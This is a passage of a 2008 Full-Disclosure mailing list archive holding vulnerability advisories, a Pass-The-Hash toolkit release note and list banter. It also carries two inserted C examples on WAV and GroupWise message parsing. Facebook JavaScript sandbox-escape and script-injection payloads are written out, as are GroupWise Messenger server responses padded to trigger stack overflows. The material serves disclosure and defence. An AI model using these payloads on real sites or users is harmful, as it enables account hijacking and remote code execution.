30/06/2008 - Vendor response.
02/07/2008 - Public disclosure.

======================================================================
7) Credits

Discovered by Alin Rad Pop, Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2008-2430 for the vulnerability.

======================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://corporate.secunia.com/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.

http://secunia.com/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:

http://corporate.secunia.com/secunia_research/33/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/secunia_vacancies/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2008-29/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================

From xploitable at gmail.com Wed Jul 2 19:16:38 2008
From: xploitable at gmail.com (n3td3v)
Date: Wed, 2 Jul 2008 19:16:38 +0100
Subject: [Full-disclosure] n3td3v podcast
Message-ID: <4b6ee9310807021116xb05210avca66b251ca35390d@mail.gmail.com>

n3td3v is starting a podcast soon, I will be talking about the latest
news post on n3td3v - Google Groups ... watch the internet for more
info.

All the best,

n3td3v

Public website: http://n3td3v.googlepages.com

From hernan at gmail.com Wed Jul 2 19:42:15 2008
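The bug class named in the Secunia VLC advisory earlier in this digest (CVE-2008-2430: an integer overflow on a file-supplied "fmt" chunk size leading to a heap overflow), shown as an added example that is not VLC's code and not part of any message in the archive. The function names, the padding constant, the size cap and the sample file are assumptions made for the illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constants and names are assumptions for this illustration, not VLC's. */
#define FMT_PAD      2u      /* extra bytes the parser appends to the chunk body */
#define FMT_MAX_SIZE 4096u   /* generous cap for a "fmt " chunk */

enum { WAV_OK = 0, WAV_EFORMAT = -1, WAV_ESIZE = -2, WAV_ENOMEM = -3, WAV_ENOFMT = -4 };

/* RIFF sizes are 32-bit little-endian values fully controlled by the file. */
static uint32_t rd_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void wr_le32(uint8_t *p, uint32_t v)
{
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

/* Weak pattern: 32-bit addition on a file-controlled size. 0xFFFFFFFF + 2 wraps
 * to 1, so the buffer is tiny while later code still trusts chunk_size. */
uint32_t fmt_alloc_size_unchecked(uint32_t chunk_size)
{
    return chunk_size + FMT_PAD;
}

/* Hardened pattern: bound the size by a cap and by the bytes actually present,
 * then do the addition in size_t, where a value <= FMT_MAX_SIZE cannot wrap. */
int fmt_alloc_size_checked(uint32_t chunk_size, size_t remaining, size_t *out)
{
    if (chunk_size > FMT_MAX_SIZE || chunk_size > remaining)
        return WAV_ESIZE;
    *out = (size_t)chunk_size + FMT_PAD;
    return WAV_OK;
}

/* Walk the RIFF chunks of an in-memory WAV file and return a heap copy of the
 * "fmt " body. The caller frees *fmt. */
int wav_load_fmt(const uint8_t *buf, size_t len, uint8_t **fmt, size_t *fmt_len)
{
    size_t off = 12;
    if (len < 12 || memcmp(buf, "RIFF", 4) != 0 || memcmp(buf + 8, "WAVE", 4) != 0)
        return WAV_EFORMAT;
    while (len - off >= 8) {
        uint32_t size = rd_le32(buf + off + 4);
        size_t remaining = len - off - 8;
        if (memcmp(buf + off, "fmt ", 4) == 0) {
            size_t alloc;
            if (fmt_alloc_size_checked(size, remaining, &alloc) != WAV_OK)
                return WAV_ESIZE;
            *fmt = calloc(1, alloc);
            if (*fmt == NULL)
                return WAV_ENOMEM;
            memcpy(*fmt, buf + off + 8, size);   /* size <= remaining and < alloc */
            *fmt_len = size;
            return WAV_OK;
        }
        if (size > remaining)          /* other chunk claims more than the file holds */
            return WAV_ESIZE;
        size_t skip = (size_t)size + (size & 1u);   /* bodies are padded to even length */
        off += 8 + (skip > remaining ? remaining : skip);
    }
    return WAV_ENOFMT;
}

/* Constructed sample (not a real capture): RIFF/WAVE header plus one "fmt "
 * chunk with a 16-byte PCM body. size_field is what the chunk header claims. */
size_t build_sample_wav(uint8_t out[36], uint32_t size_field)
{
    static const uint8_t pcm_fmt[16] = {
        1, 0, 2, 0, 0x44, 0xAC, 0, 0, 0x10, 0xB1, 2, 0, 4, 0, 16, 0 };
    memcpy(out, "RIFF", 4);
    wr_le32(out + 4, 28);              /* RIFF size = file length - 8 */
    memcpy(out + 8, "WAVE", 4);
    memcpy(out + 12, "fmt ", 4);
    wr_le32(out + 16, size_field);
    memcpy(out + 20, pcm_fmt, 16);
    return 36;
}

int main(void)
{
    uint8_t wav[36], *fmt = NULL;
    size_t n = 0, len = build_sample_wav(wav, 16);
    printf("honest size 16: rc=%d\n", wav_load_fmt(wav, len, &fmt, &n));
    free(fmt);
    fmt = NULL;
    build_sample_wav(wav, 0xFFFFFFFFu);
    printf("unchecked allocation for 0xFFFFFFFF: %u byte(s)\n",
           (unsigned)fmt_alloc_size_unchecked(0xFFFFFFFFu));
    printf("checked parser on the same file: rc=%d\n", wav_load_fmt(wav, len, &fmt, &n));
    return 0;
}
```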
From: hernan at gmail.com (Hernan Ochoa)
Date: Wed, 2 Jul 2008 15:42:15 -0300
Subject: [Full-disclosure] Release of Pass-The-Hash Toolkit v1.4
Message-ID:

Source Code:
http://oss.coresecurity.com/pshtoolkit/release/1.4/pshtoolkit_v1.4-src.tgz

Win32 Binaries:
http://oss.coresecurity.com/pshtoolkit/release/1.4/pshtoolkit_v1.4.tgz

Documentation/info:
http://oss.coresecurity.com/projects/pshtoolkit.htm
http://oss.coresecurity.com/pshtoolkit/doc/index.html
http://hexale.blogspot.com
http://www.hexale.org/forums

What's new?:
(http://oss.coresecurity.com/pshtoolkit/release/1.4/WHATSNEW)

*Support for XP SP 3 for whosthere/iam (whosthere-alt/iam-alt work on
xp sp3 without requiring any update)

*New -t switch for whosthere/whosthere-alt: establishes interval used
by the -i switch (by default 2 seconds).

*New -a switch for whosthere/iam: specify addresses to use. Format:
ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSESSIONLIST_COUNT_ADDR
(WARNING!: if you use the wrong values the system may crash)
The idea is that, if you find yourself in a version of Windows where
whosthere/iam don't work (and iam-alt/whosthere-alt don't work
either); you can run LSASRV.DLL thru IDA, run the PASSTHEHASH.IDC
script included in the Pass-The-Hash toolkit, and use the addresses
found by the script with the -a switch. This basically allows you to
specify addresses at runtime to whosthere without the need to
recompile the tool.

*New -r switch for iam/iam-alt: Create a new logon session and run a
command with the specified credentials (e.g.: -r cmd.exe)

*genhash now outputs hashes using the LM HASH:NT HASH format

*several bugfixes and stuff

From noreply at infobyte.com.ar Wed Jul 2 22:13:01 2008
From: noreply at infobyte.com.ar ([ISR] - Infobyte Security Research)
Date: Wed, 2 Jul 2008 18:13:01 -0300
Subject: [Full-disclosure] Novell GroupWise Messenger Client (GWIM) Remote Stack Overflow
Message-ID: <200807021813.01654.noreply@infobyte.com.ar>

||
|| [ISR]
|| Infobyte Security Research
|| www.infobyte.com.ar
|| 07.02.2008
||

.:: SUMMARY

Novell GroupWise Messenger Client (GWIM) Remote Stack Overflow

Version: 2.0, It is suspected that all previous versions of Groupwise
Messenger Client are vulnerable.

.:: BACKGROUND

Novell GroupWise Messenger is a corporate instant messaging product
that uses Novell eDirectory as its user database

More info: http://www.novell.com

.:: VULNERABILITY VIDEO DEMO

http://www.infobyte.com.ar/demo/ISR_groupwise_messenger.html

.:: POC

ISR-groupwisemsn.pl, simple fake groupwise msn server.
http://www.infobyte.com.ar/developments.html

.:: DESCRIPTION

Issue 1:
-------

This issue is due to a failure of the application to securely parse
the server's response.

The application server works similarly to the HTTP protocol, default
tcp port 8300.

The server always responds to the client's request with something
like this:

"
HTTP/1.0 200 \r
Date: xxx, xx xxx xxxx xx:xx:xx GMT\r
Pragma: no-cache\r
Cache-Control: no-cache\r
\r
%VALUES%
\0\0\0
\0\24\0\0\0NM_A_SZ_RESULT_CODE\0\2\0\0\x000\0
\0\27\0\0\0NM_A_SZ_TRANSACTION_ID\0\2\0\0\x001\0\0
"

If the client application receives a server response to any request
like the following, a stack overflow occurs:

"
HTTP/1.0 200 \r
Date: xxx, xx xxx xxxx xx:xx:xx GMT\r
Pragma: no-cache\r
Cache-Control: no-cache\r
\r
%VALUES%
\0\0\0
\0\24\0\0\0NM_A_SZ_RESULT_CODE\0\2\0\0\x000\0
\0\27\0\0\0NM_A_SZ_TRANSACTION_ID\0\2\0\0\x001\0\0"+
"AAAAAAAAAA...." x 5000

Issue 2:
------

We found another stack overflow regarding the client's popup alerts.
When you receive a message from another user, the server sends a
string like this to the client:

"l\0\0\x001\0\0\0CN=XXXX,OU=XX,OU=XXXX,OU=XX,OU=XX,O=INFOBYTEXX\0'\0\0\0[87
1F8247-4B110000-0A01C80A-6C20-010
0]\0\1\0\0\0\xE4\0\0\0{\\rtf1\\fbidis\\ansi\\ansicpg1252\\deff0\\deflang308
2{\\fonttbl{\\f0\\fswiss\\fprq2\\fcharset0
fontname;}}\r\n{\\colortbl;\\red0\\green0\\blue0;}\r\n\\viewkind4\\uc1\\par
d\\ltrpar\\li50\\ri50\\cf1\\f0\\fs20
MESSAGE\\par\r\n}\r\n\0";

If a client receives a string like this but with an "A" x 5000 added
at any place in the string, you have another stack overflow.

.:: IMPACT

Both vulnerabilities permit arbitrary code execution.

.:: VENDOR RESPONSE

Vendor advisory:
http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5026700.html

.:: CVE INFORMATION

Id: CVE-2008-2703, CVE-2008-2704
Web: http://cve.mitre.org

.:: DISCLOSURE TIMELINE

01/12/2008 Initial vendor notification
01/13/2007 Initial vendor response notify research
06/10/2007 Coordinated public disclosure

.:: CREDIT

Francisco Amato is credited with discovering this vulnerability.
famato][at][infobyte][dot][com][dot][ar

.:: LEGAL NOTICES

Copyright (c) 2007 by [ISR] Infobyte Security Research.
Permission to redistribute this alert electronically is granted as
long as it is not edited in any way unless authorized by Infobyte
Security Research Response.
Reprinting the whole or part of this alert in any medium other than
electronically requires permission from infobyte com ar

Disclaimer
The information in the advisory is believed to be accurate at the
time of publishing based on currently available information. Use of
the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

From jouko at iki.fi Thu Jul 3 00:01:28 2008
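One way a client could read the length-prefixed fields visible in the sample response of the Infobyte GroupWise Messenger advisory above without trusting the peer's lengths, as an added example that is not Novell's code and not part of the advisory. The field layout (a 32-bit little-endian length followed by that many bytes ending in NUL) is inferred from the bytes quoted in the advisory and is an assumption, as are the function names, the buffer sizes and the field name EXAMPLE_FIELD.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Destination sizes and all names below are assumptions made for this example. */
#define NAME_CAP   64
#define VALUE_CAP  256
#define MAX_FIELDS 8

enum { F_OK = 0, F_TRUNCATED = -1, F_TOO_LONG = -2, F_UNTERMINATED = -3, F_TOO_MANY = -4 };

struct field { char name[NAME_CAP]; char value[VALUE_CAP]; };

static uint32_t rd_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Read one string stored as <le32 length><bytes ending in NUL> into dst[cap].
 * The length is checked against the bytes left in the message and against the
 * destination size before anything is copied. */
static int read_lpstr(const uint8_t *buf, size_t len, size_t *off, char *dst, size_t cap)
{
    if (len - *off < 4)
        return F_TRUNCATED;
    uint32_t n = rd_le32(buf + *off);
    const uint8_t *body = buf + *off + 4;
    if (n == 0 || n > len - *off - 4)
        return F_TRUNCATED;            /* claims more bytes than were received */
    if (n > cap)
        return F_TOO_LONG;             /* would overrun the fixed-size buffer */
    if (body[n - 1] != '\0')
        return F_UNTERMINATED;
    memcpy(dst, body, n);
    *off += 4 + (size_t)n;
    return F_OK;
}

/* Parse name/value pairs until the buffer is exhausted. Leftover bytes that do
 * not form a complete, in-bounds field make the whole message invalid. */
int parse_fields(const uint8_t *buf, size_t len, struct field *out, size_t *count)
{
    size_t off = 0;
    *count = 0;
    while (off < len) {
        int rc;
        if (*count == MAX_FIELDS)
            return F_TOO_MANY;
        if ((rc = read_lpstr(buf, len, &off, out[*count].name, NAME_CAP)) != F_OK)
            return rc;
        if ((rc = read_lpstr(buf, len, &off, out[*count].value, VALUE_CAP)) != F_OK)
            return rc;
        (*count)++;
    }
    return F_OK;
}

/* Append one length-prefixed, NUL-terminated string to a test message. */
static size_t put_lpstr(uint8_t *out, size_t off, const char *s)
{
    size_t n = strlen(s) + 1;
    out[off] = n & 0xff;
    out[off + 1] = (n >> 8) & 0xff;
    out[off + 2] = (n >> 16) & 0xff;
    out[off + 3] = (n >> 24) & 0xff;
    memcpy(out + off + 4, s, n);
    return off + 4 + n;
}

/* Constructed sample (not a capture): the two field names quoted in the
 * advisory, then an optional third field whose value is pad_len filler bytes.
 * out must hold at least 6000 bytes. Returns the message length. */
size_t build_sample(uint8_t *out, size_t pad_len)
{
    static char pad[5001];
    size_t off = 0;
    off = put_lpstr(out, off, "NM_A_SZ_RESULT_CODE");
    off = put_lpstr(out, off, "0");
    off = put_lpstr(out, off, "NM_A_SZ_TRANSACTION_ID");
    off = put_lpstr(out, off, "1");
    if (pad_len > 0) {
        if (pad_len > sizeof pad - 1)
            pad_len = sizeof pad - 1;
        memset(pad, 'A', pad_len);
        pad[pad_len] = '\0';
        off = put_lpstr(out, off, "EXAMPLE_FIELD");   /* hypothetical field name */
        off = put_lpstr(out, off, pad);
    }
    return off;
}

int main(void)
{
    static uint8_t msg[6000];
    struct field f[MAX_FIELDS];
    size_t count = 0;
    size_t len = build_sample(msg, 0);
    printf("well-formed: rc=%d fields=%zu\n", parse_fields(msg, len, f, &count), count);
    len = build_sample(msg, 5000);
    printf("oversized value: rc=%d fields=%zu\n", parse_fields(msg, len, f, &count), count);
    return 0;
}
```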
From: jouko at iki.fi (Jouko Pynnonen)
Date: Thu, 3 Jul 2008 02:01:28 +0300
Subject: [Full-disclosure] Facebook script injection vulnerabilities
Message-ID: <7af564ad0807021601pfd2a87clcc124fbe8b897510@mail.gmail.com>

Hello,

This is a summary of various Facebook security issues found and
reported since June 13, 2008. Two of the vulnerabilities still remain
on the site, so no details of them are disclosed here. The rest have
been fixed.

Any of these could be exploited to take over the victim's web browser
temporarily to e.g. read inbox messages, forcibly install FB
applications, manipulate friend lists, post messages as the victim
user, etc. Any of these would also allow creation of a
self-propagating JavaScript virus/worm.

Most of the issues require the victim user to click on a profile box
or visit a canvas page of an application in order to trigger the
injected JavaScript. Issues 2) and 3) don't require mouse clicks.

The vulnerabilities were tested with two browsers: Firefox 3 (Linux +
Windows) and Internet Explorer 7.


1) Escaping JS sandbox with literal Function constructor reference

Impact: execution of unrestricted JS on canvas pages or profiles
(mouseclick required on profile pages)
Description: The JS sandbox denies references to Function.constructor
but using a literal such as "function f() { }" in the code and
referring to its constructor with the "bracket syntax" was possible.
The example below uses this method and calls the constructor with a
string argument, then calls the resulting Function object.
Browsers: FF, IE
Reported: June 13, 2008
Fixed: yes
Example:

(function f(){}["constructor"]("alert('any javascript here');"))();


2) Fb:silverlight JS injection

Impact: execution of unrestricted JS on canvas pages, profiles
Description: Simple XSS, described in the previous message to
full-disclosure.
Browsers: FF, IE
Reported: June 16, 2008
Fixed: yes
Example:


3) Injecting JS in Feeds

Impact: execution of unrestricted JS when viewing Feeds on profile
page or the "home" page
Description: Insufficient input validation in the
publishTemplatizedAction API method.
Browsers: FF, IE
Reported: June 16, 2008
Fixed: yes
Example:

# using the perl API
$facebook->feed->publish_templatized_action(
    title => "My Title",
    title_template => "{actor} is testing feed stories",
    body_template => "hello",
    image_1 => "http://www.mysite.com/image.gif'\" onload=(function f(){}['constructor']('alert(1)'))();",
    image_1_link => "http://www.mysite.com"
);


4) Escaping JS sandbox with literal Number reference

Impact: execution of unrestricted JS on canvas pages or profiles
(mouseclick required on profile pages)
Description: Using the "bracket syntax" to reference the __parent__
property of a floating point number to get a Window object reference,
then calling its eval() to run arbitrary code. IE doesn't support the
property.
Browsers: FF
Reported: June 18, 2008
Fixed: yes
Example:


5) Injecting JS in video attachments

Impact: execution of unrestricted JS when an inbox, wall or forum
message is viewed (mouseclick required)
Description: When sharing video content with the
http://www.facebook.com/sharer.php form, some input fields can be
modified e.g. with JavaScript. The example below can be typed in the
address bar to inject JS in a message.
Browsers: FF, IE
Reported: June 20, 2008
Fixed: yes
Example:

javascript:f=document.forms[0];f['attachment[params][video][src]'].value='#" a=b>


6) Escaping JS sandbox with E4X

Impact: execution of unrestricted JS on canvas pages or profiles
(mouseclick required on profile pages). Works in browsers supporting
E4X (Firefox)
Description: JS parser in browsers supporting E4X understand XML,
which can contain multi-line strings. Facebook's JS sandbox technology
didn't expect XML and multi-line strings. The example below
demonstrates how this could be used to fool the sandbox logic.
Browsers: FF
Reported: June 26, 2008
Fixed: yes
Example:


7) Escaping JS sandbox

Impact: execution of unrestricted JS on canvas pages or profiles
(mouseclick required on profile pages)
Browsers: FF
Reported: June 21, 2008
Fixed: no


8) Escaping JS sandbox

Impact: execution of unrestricted JS on canvas pages or profiles
(mouseclick required on profile pages)
Browsers: FF
Reported: June 21, 2008
Fixed: no


--
Jouko Pynnönen
http://iki.fi/jouko
Finland

From mrdkaaa at stream.cz Thu Jul 3 01:20:11 2008
From: mrdkaaa at stream.cz (mrdkaaa)
Date: Thu, 03 Jul 2008 02:20:11 +0200 (CEST)
Subject: [Full-disclosure] Novell GroupWise Messenger Client (GWIM) Remote Stack Overflow
In-Reply-To: <200807021813.01654.noreply@infobyte.com.ar>
Message-ID: <28.44-12928-1229769866-1215044411@stream.cz>

amazing :)

> .:: DISCLOSURE TIMELINE
>
> 01/12/2008 Initial vendor notification
> 01/13/2007 Initial vendor response notify research
> 06/10/2007 Coordinated public disclosure
>

From staff at lul-disclosure.net Wed Jul 2 05:07:40 2008
From: staff at lul-disclosure.net (staff)
Date: Wed, 2 Jul 2008 00:07:40 -0400
Subject: [Full-disclosure] Critical Aol Insta Chats Bug!
Message-ID:

Critical vulnerability in Aol Insta Chats could allow remote
compromise!

http://lul-disclosure.net/exploits/lul-aim.txt

Greetz to Aviv Raff!

--
submit to: staff [at] lul-disclosure.net

From dancho.danchev at gmail.com Thu Jul 3 13:52:20 2008
From: dancho.danchev at gmail.com (Dancho Danchev)
Date: Thu, 3 Jul 2008 15:52:20 +0300
Subject: [Full-disclosure] Gmail, Yahoo and Hotmail’s CAPTCHA broken by spammers
Message-ID:

Hello,

Breaking Gmail, Yahoo and Hotmail's CAPTCHAs, has been an urban legend for over two years now, with do-it-yourself CAPTCHA breaking services, and proprietary underground tools assisting spammers, phishers and malware authors into registering hundreds of thousands of bogus accounts for spamming and fraudulent purposes. This post intends to make this official, by covering an underground service offering thousands of already registered Gmail, Yahoo and Hotmail accounts for sale, with new ones registered every second clearly indicating the success rate of their CAPTCHA breaking capabilities at these services :

http://blogs.zdnet.com/security/?p=1418

Regards
--
Dancho Danchev
Cyber Threats Analyst/Blogger
http://ddanchev.blogspot.com
http://blogs.zdnet.com/security
http://windowsecurity.com/Dancho_Danchev

From announce-noreply at rpath.com Thu Jul 3 14:05:45 2008
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Thu, 03 Jul 2008 09:05:45 -0400
Subject: [Full-disclosure] rPSA-2008-0212-1 tshark wireshark
Message-ID: <486ccea9.DPckXhTwzo1aD3Ki%announce-noreply@rpath.com>

rPath Security Advisory: 2008-0212-1
Published: 2008-07-03
Products:
    rPath Linux 1

Rating: Major
Exposure Level Classification:
    Indirect Deterministic Information Exposure
Updated Versions:
    tshark=conary.rpath.com at rpl:1/1.0.1-0.1-1
    wireshark=conary.rpath.com at rpl:1/1.0.1-0.1-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2638

Description:
    Previous versions of the wireshark package are vulnerable to multiple types of attacks, including Information Exposures (disclosures of system memory) and Denials of service (application crashes). It has not been determined that these vulnerabilities can be exploited to execute malicious code.

http://wiki.rpath.com/Advisories:rPSA-2008-0212

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

From announce-noreply at rpath.com Thu Jul 3 13:57:26 2008
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Thu, 03 Jul 2008 08:57:26 -0400
Subject: [Full-disclosure] rPSA-2008-0211-1 mercurial mercurial-hgk
Message-ID: <486cccb6./Pv2KH8iBdkWlEln%announce-noreply@rpath.com>

rPath Security Advisory: 2008-0211-1
Published: 2008-07-03
Products:
    rPath Linux 2

Rating: Major
Exposure Level Classification:
    Indirect User Deterministic Unauthorized Access
Updated Versions:
    mercurial=conary.rpath.com at rpl:2/1.0.1-1-0.1
    mercurial-hgk=conary.rpath.com at rpl:2/1.0.1-1-0.1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2633

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2942

Description:
    Previous versions of the mercurial package are vulnerable to an Unauthorized Access attack in which maliciously crafted patches may overwrite arbitrary local files, including files located outside mercurial repositories.

http://wiki.rpath.com/Advisories:rPSA-2008-0211

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

From DDI.VulnerabilityAlert at digitaldefense.net Thu Jul 3 14:36:53 2008
From: DDI.VulnerabilityAlert at digitaldefense.net (DDI_Vulnerability_Alert)
Date: Thu, 3 Jul 2008 08:36:53 -0500
Subject: [Full-disclosure] DDIVRT-2008-12-ServerView SnmpGetMibValues.exe Buffer Overflow
Message-ID: <2571D31D42513640AE1632FEE100E0E40191E74F@hypercom.defense.local>

Title
-----
DDIVRT-2008-12-ServerView SnmpGetMibValues.exe Buffer Overflow

Severity
--------
High

Date Discovered
---------------
May 1st, 2008

Discovered By
-------------
Digital Defense, Inc. Vulnerability Research Team
Credit: Steven James, Mike James, and r at b13$

Vulnerability Description
-------------------------
ServerView is a server management suite. Several buffer overflow conditions exist in remotely-accessible portions of the suite. Authenticated users (by default, all users) can cause a stack overflow by sending a specially-crafted URL to the ServerView web interface. Successful exploitation results in the execution of arbitrary code.

Solution Description
--------------------
Authenticate remote users who use the web interface to minimize potential malicious users. As of yet, a patch has not been issued by the vendor.

Tested Systems / Software (with versions)
------------------------------------------
ServerView 04.60.07 was tested on Windows XP. Other versions are assumed to be vulnerable.

Vendor Contact
--------------
Name: Fujitsu Siemens
Website: http://www.fujitsu-siemens.com/
Contact Information: Contact form - http://support.fujitsu-siemens.com/com/support/contact/contact.html

From pentester at yahoo.com Wed Jul 2 20:52:24 2008
From: pentester at yahoo.com (nobody)
Date: Wed, 2 Jul 2008 12:52:24 -0700 (PDT)
Subject: [Full-disclosure] WinMagic HDE encryption
Message-ID: <765815.12883.qm@web51005.mail.re2.yahoo.com>

Anyone know if the page file (pagefile.sys) is encrypted when this product is installed and the hard drive encrypted.

Also - using backtrack - can the hard drive (NTFS - 1 volume) be mounted after encryption. I have been successful on one machine and failed on another. In both cases "fdisk" reported exactly the same layout but mounting failed on 1 machine and succeeded on an identical machine. I did not have time to review the page file on the machine that I was able to mount the HD.

??

From ureleet at gmail.com Thu Jul 3 19:51:24 2008
From: ureleet at gmail.com (Ureleet)
Date: Thu, 3 Jul 2008 14:51:24 -0400
Subject: [Full-disclosure] n3td3v podcast
In-Reply-To: <4b6ee9310807021116xb05210avca66b251ca35390d@mail.gmail.com>
References: <4b6ee9310807021116xb05210avca66b251ca35390d@mail.gmail.com>
Message-ID: <6158bb410807031151u44989fa2qc7db35217e851a0b@mail.gmail.com>

yeah, cause we need another podcast like u need a hole in the head.

On Wed, Jul 2, 2008 at 2:16 PM, n3td3v wrote:
> n3td3v is starting a podcast soon, I will be talking about the latest
> news post on
> n3td3v - Google Groups ... watch the internet for more info.
>
> All the best,
>
> n3td3v
>
> Public website: http://n3td3v.googlepages.com
>

From ureleet at gmail.com Thu Jul 3 19:53:30 2008
From: ureleet at gmail.com (Ureleet)
Date: Thu, 3 Jul 2008 14:53:30 -0400
Subject: [Full-disclosure] Gmail, Yahoo and Hotmail’s CAPTCHA broken by spammers
In-Reply-To:
References:
Message-ID: <6158bb410807031153u44275bb7t1217b2903a270f5e@mail.gmail.com>

didn't this happen like 6 months ago too? come on! it'll be a tail chase, the vendors will improve the captcha, the spammers will break it, they'll improve it.. etc.. it's never ending bullshit.

On Thu, Jul 3, 2008 at 8:52 AM, Dancho Danchev wrote:
> Hello,
>
> Breaking Gmail, Yahoo and Hotmail's CAPTCHAs, has been an urban legend
> for over two years now, with do-it-yourself CAPTCHA breaking services,
> and proprietary underground tools assisting spammers, phishers and
> malware authors into registering hundreds of thousands of bogus
> accounts for spamming and fraudulent purposes. This post intends to
> make this official, by covering an underground service offering
> thousands of already registered Gmail, Yahoo and Hotmail accounts for
> sale, with new ones registered every second clearly indicating the
> success rate of their CAPTCHA breaking capabilities at these services
> :
>
> http://blogs.zdnet.com/security/?p=1418
>
> Regards
> --
> Dancho Danchev
> Cyber Threats Analyst/Blogger
> http://ddanchev.blogspot.com
> http://blogs.zdnet.com/security
> http://windowsecurity.com/Dancho_Danchev
>

From xploitable at gmail.com Thu Jul 3 21:26:15 2008
From: xploitable at gmail.com (n3td3v)
Date: Thu, 3 Jul 2008 21:26:15 +0100
Subject: [Full-disclosure] n3td3v podcast
In-Reply-To: <6158bb410807031151u44989fa2qc7db35217e851a0b@mail.gmail.com>
References: <4b6ee9310807021116xb05210avca66b251ca35390d@mail.gmail.com> <6158bb410807031151u44989fa2qc7db35217e851a0b@mail.gmail.com>
Message-ID: <4b6ee9310807031326i68f9b82apc6aab34f2729d1a@mail.gmail.com>

On Thu, Jul 3, 2008 at 7:51 PM, Ureleet wrote:
> yeah, cause we need another podcast like u need a hole in the head.
>

Don't make death threats you can't carry out. Uncle sam is watching!!!

All the best,

n3td3v

> On Wed, Jul 2, 2008 at 2:16 PM, n3td3v wrote:
>> n3td3v is starting a podcast soon, I will be talking about the latest
>> news post on
>> n3td3v - Google Groups ... watch the internet for more info.
>>
>> All the best,
>>
>> n3td3v
>>
>> Public website: http://n3td3v.googlepages.com
>>
>

From william at lefkovics.net Thu Jul 3 21:32:15 2008
From: william at lefkovics.net (William Lefkovics)
Date: Thu, 3 Jul 2008 13:32:15 -0700
Subject: [Full-disclosure] n3td3v podcast
In-Reply-To: <4b6ee9310807031326i68f9b82apc6aab34f2729d1a@mail.gmail.com>
References: <4b6ee9310807021116xb05210avca66b251ca35390d@mail.gmail.com> <6158bb410807031151u44989fa2qc7db35217e851a0b@mail.gmail.com> <4b6ee9310807031326i68f9b82apc6aab34f2729d1a@mail.gmail.com>
Message-ID: <024701c8dd4b$e1c8ad50$a55a07f0$@net>

It wasn't a threat... it was a simile. :)

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of n3td3v
Sent: Thursday, July 03, 2008 1:26 PM
To: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] n3td3v podcast

On Thu, Jul 3, 2008 at 7:51 PM, Ureleet wrote:
> yeah, cause we need another podcast like u need a hole in the head.
>

Don't make death threats you can't carry out. Uncle sam is watching!!!

All the best,

n3td3v

From xploitable at gmail.com Thu Jul 3 22:02:01 2008
From: xploitable at gmail.com (n3td3v)
Date: Thu, 3 Jul 2008 22:02:01 +0100
Subject: [Full-disclosure] n3td3v podcast
In-Reply-To: <024701c8dd4b$e1c8ad50$a55a07f0$@net>
References: <4b6ee9310807021116xb05210avca66b251ca35390d@mail.gmail.com> <6158bb410807031151u44989fa2qc7db35217e851a0b@mail.gmail.com> <4b6ee9310807031326i68f9b82apc6aab34f2729d1a@mail.gmail.com> <024701c8dd4b$e1c8ad50$a55a07f0$@net>
Message-ID: <4b6ee9310807031402hbb1ab53w2b53d760f1d803c0@mail.gmail.com>

On Thu, Jul 3, 2008 at 9:32 PM, William Lefkovics wrote:
> It wasn't a threat... it was a simile. :)
>

Keep this thread bookmarked just in case, we don't actually know who Ureleet is, it could be an Al-Qaeda splinter cell working independently of Osama Bin Laden's command.

All the best,

n3td3v

> -----Original Message-----
> From: full-disclosure-bounces at lists.grok.org.uk
> [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of n3td3v
> Sent: Thursday, July 03, 2008 1:26 PM
> To: full-disclosure at lists.grok.org.uk
> Subject: Re: [Full-disclosure] n3td3v podcast
>
> On Thu, Jul 3, 2008 at 7:51 PM, Ureleet wrote:
>> yeah, cause we need another podcast like u need a hole in the head.
>>
>
> Don't make death threats you can't carry out. Uncle sam is watching!!!
>
> All the best,
>
> n3td3v
>

From buanzo at buanzo.com.ar Thu Jul 3 22:09:52 2008
From: buanzo at buanzo.com.ar (Arturo 'Buanzo' Busleiman)
Date: Thu, 03 Jul 2008 18:09:52 -0300
Subject: [Full-disclosure] n3td3v podcast
In-Reply-To: <4b6ee9310807031402hbb1ab53w2b53d760f1d803c0@mail.gmail.com>
